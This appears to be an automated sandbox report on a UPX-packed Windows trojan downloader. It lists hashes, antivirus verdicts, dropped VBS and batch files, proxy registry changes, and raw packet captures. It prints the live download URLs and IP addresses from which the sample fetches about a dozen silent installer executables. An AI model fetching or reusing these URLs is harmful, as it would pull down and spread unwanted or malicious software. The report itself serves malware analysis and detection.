Analysis Date2014-11-06 23:59:36
MD5b26421e558bcd33e22fa2b149951af39
SHA16fe71521a2e9365abaa9273d18c30d868e39629c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: 0844205a3142c650215828fd56c965b0 sha1: 0390375d6d289eedcc2dc53fe53d05fb80c19a2e size: 20480
Section.rsrc md5: 71ab25bedf3c472ee7df5f3f204a3fda sha1: d176a9d4cb24c983766e7ab7cbe6a2e4f86a8eb4 size: 6144
Timestamp2009-02-07 06:33:08
PackerUPX -> www.upx.sourceforge.net
PEhashbf6bf3b86da7c45d2116100c727372a932541f85
IMPhash26d3c4cf36a46cd980f89d55afb73146
AV360 SafeTrojan.Generic.12035610
AVAd-AwareTrojan.Generic.12035610
AVAlwil (avast)ADODB-BM [Expl]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Downloader.KKXJ-8661
AVAvira (antivir)TR/Dldr.Agent.ahk.3
AVBullGuardTrojan.Generic.12035610
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftTrojan.Generic.12035610
AVEset (nod32)no_virus
AVFortinetVBS/Agent.AHK!tr.dldr
AVFrisk (f-prot)no_virus
AVF-SecureTrojan.Generic.12035610
AVGrisoft (avg)VBS/Psyme.dropper
AVIkarusWin32.SuspectCrc
AVK7Riskware ( 0040eff71 )
AVKasperskyTrojan-Downloader.VBS.Agent.ahk
AVMalwareBytesno_virus
AVMcafeeRDN/Generic Downloader.x!lg
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)no_virus
AVNormanTrojan.Generic.12035610
AVRisingno_virus
AVSophosno_virus
AVSymantecno_virus
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File123.VBS
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\1.tmp\setup.bat
Creates Filesetup.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\1.tmp

Process
↳ C:\WINDOWS\system32\cmd.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FilePIPE\wkssvc
Creates Process123.VBS
Creates Process"C:\WINDOWS\System32\WScript.exe" "C:\WINDOWS\system32\123.VBS"
Creates Processping -n 3 127.0.0.1

Process
↳ ping -n 3 127.0.0.1

Winsock DNS127.0.0.1

Process
↳ 123.VBS

Process
↳ "C:\WINDOWS\System32\WScript.exe" "C:\WINDOWS\system32\123.VBS"

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\qqpcmgr_silent_52000.exe
Creates FileC:\ADMon.29055-7601.exe
Creates FileC:\haozip_silent_52000.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\pps_silent_52000.exe
Creates FileC:\QQBrowser_silent_52000.exe
Creates FileC:\pic_silent_52000.exe
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\sogouie_silent_52000.exe
Creates FileC:\UCBrowser_silent_52000.exe
Creates FileC:\gm_5_34648_01.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\PPTV_forqd3036_07601.exe
Creates FileC:\kuwo_silent_52000.exe
Creates FileC:\baiduan_silent_52000.exe
Creates FileC:\baidusd_silent_52000.exe
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdownload.58611.net
Winsock DNSdown.2529.com

Network Details:

DNSdown.2529.com
Type: A
61.164.183.253
DNSdownload.58611.net
Type: A
218.241.29.215
HTTP GEThttp://down.2529.com/gm_5_34648_01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://download.58611.net:8181/baiduan/baiduan_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://download.58611.net:8181/baidusd/baidusd_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://download.58611.net:8181/QQBrowser/QQBrowser_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://download.58611.net:8181/uc/UCBrowser_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://download.58611.net:8181/haozip_silent/haozip_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://download.58611.net:8181/sogouie/sogouie_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://download.58611.net:8181/pic/pic_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://download.58611.net:8181/kuwo_silent/kuwo_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://download.58611.net:8181/admon/ADMon.29055-7601.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://download.58611.net:8181/pptv_silent/PPTV_forqd3036_07601.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://download.58611.net:8181/pps/pps_silent_52000.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 61.164.183.253:80
Flows TCP192.168.1.1:1033 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1034 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1035 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1036 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1037 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1038 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1039 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1040 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1041 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1042 ➝ 218.241.29.215:8181
Flows TCP192.168.1.1:1043 ➝ 218.241.29.215:8181

Raw Pcap
0x00000000 (00000)   47455420 2f676d5f 355f3334 3634385f   GET /gm_5_34648_
0x00000010 (00016)   30312e65 78652048 5454502f 312e310d   01.exe HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000030 (00048)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000040 (00064)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000050 (00080)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000060 (00096)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000070 (00112)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000080 (00128)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x00000090 (00144)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000a0 (00160)   30373237 290d0a48 6f73743a 20646f77   0727)..Host: dow
0x000000b0 (00176)   6e2e3235 32392e63 6f6d0d0a 436f6e6e   n.2529.com..Conn
0x000000c0 (00192)   65637469 6f6e3a20 4b656570 2d416c69   ection: Keep-Ali
0x000000d0 (00208)   76650d0a 0d0a                         ve....

0x00000000 (00000)   47455420 2f626169 6475616e 2f626169   GET /baiduan/bai
0x00000010 (00016)   6475616e 5f73696c 656e745f 35323030   duan_silent_5200
0x00000020 (00032)   302e6578 65204854 54502f31 2e310d0a   0.exe HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 646f776e   727)..Host: down
0x000000c0 (00192)   6c6f6164 2e353836 31312e6e 65743a38   load.58611.net:8
0x000000d0 (00208)   3138310d 0a436f6e 6e656374 696f6e3a   181..Connection:
0x000000e0 (00224)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f626169 64757364 2f626169   GET /baidusd/bai
0x00000010 (00016)   64757364 5f73696c 656e745f 35323030   dusd_silent_5200
0x00000020 (00032)   302e6578 65204854 54502f31 2e310d0a   0.exe HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 646f776e   727)..Host: down
0x000000c0 (00192)   6c6f6164 2e353836 31312e6e 65743a38   load.58611.net:8
0x000000d0 (00208)   3138310d 0a436f6e 6e656374 696f6e3a   181..Connection:
0x000000e0 (00224)   204b6565 702d416c 6976650d 0a0d0a      Keep-Alive....

0x00000000 (00000)   47455420 2f515142 726f7773 65722f51   GET /QQBrowser/Q
0x00000010 (00016)   5142726f 77736572 5f73696c 656e745f   QBrowser_silent_
0x00000020 (00032)   35323030 302e6578 65204854 54502f31   52000.exe HTTP/1
0x00000030 (00048)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000040 (00064)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000050 (00080)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000080 (00128)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000090 (00144)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x000000a0 (00160)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000b0 (00176)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000c0 (00192)   646f776e 6c6f6164 2e353836 31312e6e   download.58611.n
0x000000d0 (00208)   65743a38 3138310d 0a436f6e 6e656374   et:8181..Connect
0x000000e0 (00224)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000f0 (00240)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f75632f 55434272 6f777365   GET /uc/UCBrowse
0x00000010 (00016)   725f7369 6c656e74 5f353230 30302e65   r_silent_52000.e
0x00000020 (00032)   78652048 5454502f 312e310d 0a416363   xe HTTP/1.1..Acc
0x00000030 (00048)   6570743a 202a2f2a 0d0a4163 63657074   ept: */*..Accept
0x00000040 (00064)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000050 (00080)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000a0 (00160)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000b0 (00176)   290d0a48 6f73743a 20646f77 6e6c6f61   )..Host: downloa
0x000000c0 (00192)   642e3538 3631312e 6e65743a 38313831   d.58611.net:8181
0x000000d0 (00208)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x000000e0 (00224)   65702d41 6c697665 0d0a0d0a 6976650d   ep-Alive....ive.
0x000000f0 (00240)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f68616f 7a69705f 73696c65   GET /haozip_sile
0x00000010 (00016)   6e742f68 616f7a69 705f7369 6c656e74   nt/haozip_silent
0x00000020 (00032)   5f353230 30302e65 78652048 5454502f   _52000.exe HTTP/
0x00000030 (00048)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000040 (00064)   0d0a4163 63657074 2d456e63 6f64696e   ..Accept-Encodin
0x00000050 (00080)   673a2067 7a69702c 20646566 6c617465   g: gzip, deflate
0x00000060 (00096)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000070 (00112)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000080 (00128)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000090 (00144)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x000000a0 (00160)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x000000b0 (00176)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000c0 (00192)   20646f77 6e6c6f61 642e3538 3631312e    download.58611.
0x000000d0 (00208)   6e65743a 38313831 0d0a436f 6e6e6563   net:8181..Connec
0x000000e0 (00224)   74696f6e 3a204b65 65702d41 6c697665   tion: Keep-Alive
0x000000f0 (00240)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f736f67 6f756965 2f736f67   GET /sogouie/sog
0x00000010 (00016)   6f756965 5f73696c 656e745f 35323030   ouie_silent_5200
0x00000020 (00032)   302e6578 65204854 54502f31 2e310d0a   0.exe HTTP/1.1..
0x00000030 (00048)   41636365 70743a20 2a2f2a0d 0a416363   Accept: */*..Acc
0x00000040 (00064)   6570742d 456e636f 64696e67 3a20677a   ept-Encoding: gz
0x00000050 (00080)   69702c20 6465666c 6174650d 0a557365   ip, deflate..Use
0x00000060 (00096)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x00000070 (00112)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x00000080 (00128)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x00000090 (00144)   6f777320 4e542035 2e313b20 5356313b   ows NT 5.1; SV1;
0x000000a0 (00160)   202e4e45 5420434c 5220322e 302e3530    .NET CLR 2.0.50
0x000000b0 (00176)   37323729 0d0a486f 73743a20 646f776e   727)..Host: down
0x000000c0 (00192)   6c6f6164 2e353836 31312e6e 65743a38   load.58611.net:8
0x000000d0 (00208)   3138310d 0a436f6e 6e656374 696f6e3a   181..Connection:
0x000000e0 (00224)   204b6565 702d416c 6976650d 0a0d0a65    Keep-Alive....e
0x000000f0 (00240)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f706963 2f706963 5f73696c   GET /pic/pic_sil
0x00000010 (00016)   656e745f 35323030 302e6578 65204854   ent_52000.exe HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000040 (00064)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000050 (00080)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000060 (00096)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000070 (00112)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000080 (00128)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000090 (00144)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x000000a0 (00160)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000b0 (00176)   73743a20 646f776e 6c6f6164 2e353836   st: download.586
0x000000c0 (00192)   31312e6e 65743a38 3138310d 0a436f6e   11.net:8181..Con
0x000000d0 (00208)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000e0 (00224)   6976650d 0a0d0a6c 6976650d 0a0d0a65   ive....live....e
0x000000f0 (00240)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f6b7577 6f5f7369 6c656e74   GET /kuwo_silent
0x00000010 (00016)   2f6b7577 6f5f7369 6c656e74 5f353230   /kuwo_silent_520
0x00000020 (00032)   30302e65 78652048 5454502f 312e310d   00.exe HTTP/1.1.
0x00000030 (00048)   0a416363 6570743a 202a2f2a 0d0a4163   .Accept: */*..Ac
0x00000040 (00064)   63657074 2d456e63 6f64696e 673a2067   cept-Encoding: g
0x00000050 (00080)   7a69702c 20646566 6c617465 0d0a5573   zip, deflate..Us
0x00000060 (00096)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x00000070 (00112)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x00000080 (00128)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x00000090 (00144)   646f7773 204e5420 352e313b 20535631   dows NT 5.1; SV1
0x000000a0 (00160)   3b202e4e 45542043 4c522032 2e302e35   ; .NET CLR 2.0.5
0x000000b0 (00176)   30373237 290d0a48 6f73743a 20646f77   0727)..Host: dow
0x000000c0 (00192)   6e6c6f61 642e3538 3631312e 6e65743a   nload.58611.net:
0x000000d0 (00208)   38313831 0d0a436f 6e6e6563 74696f6e   8181..Connection
0x000000e0 (00224)   3a204b65 65702d41 6c697665 0d0a0d0a   : Keep-Alive....
0x000000f0 (00240)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f61646d 6f6e2f41 444d6f6e   GET /admon/ADMon
0x00000010 (00016)   2e323930 35352d37 3630312e 65786520   .29055-7601.exe 
0x00000020 (00032)   48545450 2f312e31 0d0a4163 63657074   HTTP/1.1..Accept
0x00000030 (00048)   3a202a2f 2a0d0a41 63636570 742d456e   : */*..Accept-En
0x00000040 (00064)   636f6469 6e673a20 677a6970 2c206465   coding: gzip, de
0x00000050 (00080)   666c6174 650d0a55 7365722d 4167656e   flate..User-Agen
0x00000060 (00096)   743a204d 6f7a696c 6c612f34 2e302028   t: Mozilla/4.0 (
0x00000070 (00112)   636f6d70 61746962 6c653b20 4d534945   compatible; MSIE
0x00000080 (00128)   20362e30 3b205769 6e646f77 73204e54    6.0; Windows NT
0x00000090 (00144)   20352e31 3b205356 313b202e 4e455420    5.1; SV1; .NET 
0x000000a0 (00160)   434c5220 322e302e 35303732 37290d0a   CLR 2.0.50727)..
0x000000b0 (00176)   486f7374 3a20646f 776e6c6f 61642e35   Host: download.5
0x000000c0 (00192)   38363131 2e6e6574 3a383138 310d0a43   8611.net:8181..C
0x000000d0 (00208)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000e0 (00224)   416c6976 650d0a0d 0a697665 0d0a0d0a   Alive....ive....
0x000000f0 (00240)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f707074 765f7369 6c656e74   GET /pptv_silent
0x00000010 (00016)   2f505054 565f666f 72716433 3033365f   /PPTV_forqd3036_
0x00000020 (00032)   30373630 312e6578 65204854 54502f31   07601.exe HTTP/1
0x00000030 (00048)   2e310d0a 41636365 70743a20 2a2f2a0d   .1..Accept: */*.
0x00000040 (00064)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000050 (00080)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000060 (00096)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000070 (00112)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000080 (00128)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000090 (00144)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x000000a0 (00160)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000b0 (00176)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000c0 (00192)   646f776e 6c6f6164 2e353836 31312e6e   download.58611.n
0x000000d0 (00208)   65743a38 3138310d 0a436f6e 6e656374   et:8181..Connect
0x000000e0 (00224)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000f0 (00240)   0a0d0a0a                              ....

0x00000000 (00000)   47455420 2f707073 2f707073 5f73696c   GET /pps/pps_sil
0x00000010 (00016)   656e745f 35323030 302e6578 65204854   ent_52000.exe HT
0x00000020 (00032)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000030 (00048)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000040 (00064)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000050 (00080)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000060 (00096)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000070 (00112)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000080 (00128)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000090 (00144)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x000000a0 (00160)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000b0 (00176)   73743a20 646f776e 6c6f6164 2e353836   st: download.586
0x000000c0 (00192)   31312e6e 65743a38 3138310d 0a436f6e   11.net:8181..Con
0x000000d0 (00208)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000e0 (00224)   6976650d 0a0d0a65 702d416c 6976650d   ive....ep-Alive.
0x000000f0 (00240)   0a0d0a0a                              ....


Strings
&
.
..&
.
..
>:0'd/F
22cyHrR
24m|9x
8c{/H?
9l$\w_
9{*T/rg.
  <assemblyIdentity
      <assemblyIdentity
</assembly>P
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
~-#>b#N
$`	)~c
?c1:aG
=CLeSR
 c|_lf
CoInitialize
COMCTL32.dll
/cT4i1
dCl]o`
  </dependency>
  <dependency>
    </dependentAssembly>
    <dependentAssembly>
  <description></description>
.)D$H)
D$t+D$\
D$t#D$h
%ew#l}
ExitProcess
`:fAH{
GDI32.dll
GetProcAddress
$g&i0,
h*SphZ;	
InitCommonControls
IsChild
KERNEL32.DLL
(Kn(8B
kt#y7\
        language="*" />
LoadLibraryA
\LwLc\F
memset
MGf'>S
MSVCRT.dll
    name="CompanyName.ProductName.YourApp"
        name="Microsoft.Windows.Common-Controls"
|O]"6|33
OLE32.dll
        processorArchitecture="X86"
    processorArchitecture="X86"
        publicKeyToken="6595b64144ccf1df"
pUK&Vq^
PVUR o
,&->qY
SetBkColor
SHELL32.dll
ShellExecuteExA
s`)L$4
|smm #
sm<xP*
.S.OZ>4
**TEB0{T
!This program cannot be run in DOS mode.
t$t#t$l
        type="win32"
    type="win32" />
ug7$sw
USER32.dll
    version="1.0.0.0"
        version="6.0.0.0"
VEzQm6
VirtualAlloc
VirtualFree
VirtualProtect
(vlr,kf|
^ wkxS
$Wn4Q.
W.XS;W
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
XPTPSW
xy*%K!n
@*zU!2>M